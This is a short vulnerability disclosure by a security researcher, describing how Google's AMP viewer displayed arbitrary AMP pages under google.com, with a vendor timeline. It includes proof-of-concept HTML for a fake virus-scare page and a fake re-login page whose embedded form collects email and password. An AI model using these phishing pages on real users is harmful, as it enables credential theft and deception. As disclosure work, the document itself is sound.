It is possible to use a flaw in Google.com to host malicious content. However, such content is not able to interact with anything on Google.com domain itself.
Google’s main website provides a subsite for displaying mobile-optimized pages published using a special subset of HTML called AMP. The current implementation can display any AMP page on the Internet without checking content. The URL is as follows:
where XXXX is the URL of the site. This ONLY works on mobile devices and can be simulated using Chrome’s developer tools, but on desktop browsers, it will redirect to the page itself (as described in our earlier post). Here is a real working example:
Source code - BODY tag only, rest is standard AMP HTML (see here):
<body><amp-img src=”glogo.jpg” alt=”logo” height=”200px” width=”300px”></amp-img> <h3>We have scanned your phone and found it to be infected with a virus. To clean your off, please click on the link below</h3> <p><a href=”https://play.google.com/store/apps/details?id=com.cleanmaster.mguard&hl=en">Clean My Phone</a></p></body>
Main page BODY:
<body> <amp-img src=”glogo.jpg” alt=”logo” height=”300px” width=”300px”></amp-img> <amp-img src=”glogo.jpg” alt=”logo” height=”300px” width=”300px”></amp-img> <h3>You have logged out of your account, please login again below</h3> <amp-iframe width=”300px” height=”300px” sandbox=”allow-scripts allow-forms” layout=”responsive” frameborder=”0" src=”iframe.html"> </amp-iframe> </body>
<!doctype html> <html> <head> <meta charset=”utf-8"> <title>Test1</title> </head> <body> <form action=”form.py”> Email: <input type=”text” name=”email”/><br/> Password: <input type=”password” name=”password”/><br/> <input type=”submit”/> </form> </body> </html>
The vendor has communicated that they do not consider this to be a security issue
- Google Security CID: 8–1639000011264
- AMP site: https://www.ampproject.org/
Researched and written by Yakov Shafranovich.
2016–04–12: Vendor notified
2016–04–13: Vendor response
2016–04–13: Public disclosure